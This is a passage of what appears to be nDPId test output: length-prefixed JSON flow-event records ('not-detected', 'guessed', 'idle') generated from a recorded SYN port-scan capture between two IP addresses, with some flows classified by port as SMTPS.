+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","ndpi": 